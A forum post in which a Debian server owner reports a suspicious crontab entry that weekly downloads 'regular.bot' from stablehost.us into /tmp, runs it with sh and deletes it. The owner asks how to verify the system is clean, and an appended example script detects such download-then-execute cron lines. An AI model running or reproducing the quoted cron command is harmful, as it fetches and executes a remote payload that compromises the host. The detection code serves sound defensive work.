Regards,
since my server acted "weird" lately (pulling high bandwidth during my nighttimes in spikes, then automatically stopping for the past few days) I inspected the server and found a crontab which pulled regular.bot from stablehost.us
Code:
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
A quick Google search led me to the following CentOS (I'm running Debian) forum page:
https://www.centos.org/forums/viewtopic ... 17&t=48804
Looking through my device in /tmp there are no scripts which shouldn't belong as far as I can see:
Code:
root@ragnarok:/tmp# ls -alh
total 24K
drwxrwxrwt 6 root root 4.0K Jan 4 13:45 .
drwxr-xr-x 24 root root 4.0K Jan 4 05:14 ..
drwxrwxrwt 2 root root 4.0K Dec 23 23:39 .ICE-unix
drwxrwxrwt 2 root root 4.0K Dec 23 23:39 .X11-unix
-rw-r--r-- 1 root root 0 Jan 4 13:16 .sh
drwxr-xr-x 2 root root 4.0K Dec 23 23:39 .webmin
Anyone able to provide more info with a means to make sure the system is clean?
I know the best course of action would be to scrap the server and start over. This is scheduled but I currently don't yet have the time for it so if I could make sure it's not a threat at this minute, I could build the new machine on the scheduled time.
Regards,
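
Added example, not part of the original post: a shell heuristic that flags crontab lines matching the download-then-execute pattern of the @weekly entry quoted above. The function names and the sample crontab are constructed for illustration, and an empty result does not prove the host is clean.

```shell
# Added example: flag cron lines that download a file and then run it with a
# shell. Function names are hypothetical; this is a heuristic only.

# is_fetch_and_run LINE: succeeds if LINE calls wget/curl and also hands
# something to sh/bash after a ';', '&&' or '|'.
is_fetch_and_run() {
    line=$1
    case $line in
        ''|'#'*) return 1 ;;            # blank line or comment
    esac
    printf '%s\n' "$line" |
        grep -Eq '(^|[^[:alnum:]_])(wget|curl)[[:space:]]' || return 1
    printf '%s\n' "$line" |
        grep -Eq '(;|&&|\|)[[:space:]]*(/[^[:space:]]*/)?(sh|bash)([[:space:]]|$)'
}

# scan_cron_stream LABEL: read crontab text on stdin and print
# LABEL:LINENO: LINE for every suspicious entry.
scan_cron_stream() {
    label=$1
    n=0
    while IFS= read -r line || [ -n "$line" ]; do
        n=$((n + 1))
        if is_fetch_and_run "$line"; then
            printf '%s:%d: %s\n' "$label" "$n" "$line"
        fi
    done
}

# scan_system_cron: check the usual crontab locations (Debian and CentOS
# spool paths); run as root so the per-user spool files are readable.
scan_system_cron() {
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* /var/spool/cron/*; do
        [ -f "$f" ] && [ -r "$f" ] || continue
        scan_cron_stream "$f" < "$f"
    done
}

# Constructed sample; line 3 is the entry from the post.
sample_crontab() {
    cat <<'EOF'
# m h dom mon dow command
17 3 * * * /usr/local/bin/backup.sh >/dev/null 2>&1
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
0 4 * * 1 wget -q https://example.org/list.txt -O /var/cache/list.txt
EOF
}
sample_crontab | scan_cron_stream sample
```

Run `scan_system_cron` as root on the affected host to apply the same check to the real crontab files; the plain download on sample line 4 is not flagged because nothing is executed afterwards.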